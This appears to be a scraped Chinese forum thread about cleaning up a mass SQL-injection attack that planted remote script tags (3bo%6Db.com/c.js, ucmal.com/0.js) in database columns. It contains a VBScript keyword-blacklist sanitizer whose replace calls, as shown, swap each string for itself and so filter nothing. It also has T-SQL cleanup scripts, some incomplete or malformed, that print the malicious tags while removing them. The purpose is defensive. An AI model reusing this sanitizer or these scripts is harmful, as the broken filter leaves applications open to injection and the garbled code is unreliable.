28,391
社区成员
发帖
与我相关
我的任务
分享
,请大家帮忙解决!", "upDate": "2021-05-28T15:22:27+08:00" }
function FormatSQL(str)
if isnull(str) then
str = ""
exit function
end if
str=trim(str)
str=DSConvert(str,0)
' str=replace(str,"&","&") '&
' str=replace(str,";",";") '分号 第一次保存没问题。如果修改了。。这些字符就会重新替换
str=replace(str,"'","'") '单引号
str=replace(str,"""",""") '双引号
str=replace(str,"chr(9)"," ") '空格
str=replace(str,"chr(10)","<br>") '回车
str=replace(str,"chr(13)","<br>") '回车
str=replace(str,"chr(32)"," ") '空格
str=replace(str,"chr(34)",""") '双引号
str=replace(str,"chr(39)","'") '单引号
str=replace(str,"<","<") '左<
str=replace(str,">",">") '右>
str=replace(str,"(","(") '左(
str=replace(str,")",")") '右)
str=replace(str,"*","*") '*
str=replace(str,"--","--") 'SQL注释符
str=Replace(str, "script", "script")'script
str=Replace(str, "select", "select")'script
str=Replace(str, "insert", "insert")'script
str=Replace(str, "update", "update")'script
str=Replace(str, "exec", "exec")'script
str=replace(str,"|","|") '把select,insert,update,script 里的T转成HTML编码
str=replace(str,"=","=") '把select,insert,update,script 里的T转成HTML编码
FormatSQL=str
end function
DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''<script src=http://3bo%6Db.com/c.js> </script>'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
DECLARE @fieldtype sysname
SET @fieldtype='varchar'
--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
+N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
AND c.xusertype=t.xusertype
AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
update table set a=REPLACE(a,' <script src=http://3bo%6Db.com/c.js> </script>', '')
b=REPLACE(b,' <script src=http://3bo%6Db.com/c.js> </script>', '')
c=REPLACE(c,' <script src=http://3bo%6Db.com/c.js> </script>', '')
d=REPLACE(d,' <script src=http://3bo%6Db.com/c.js> </script>', '')
e=REPLACE(e,' <script src=http://3bo%6Db.com/c.js> </script>', '')
f=REPLACE(f,' <script src=http://3bo%6Db.com/c.js> </script>', '')
update table set col=replace(col,'你要替换的字符串','')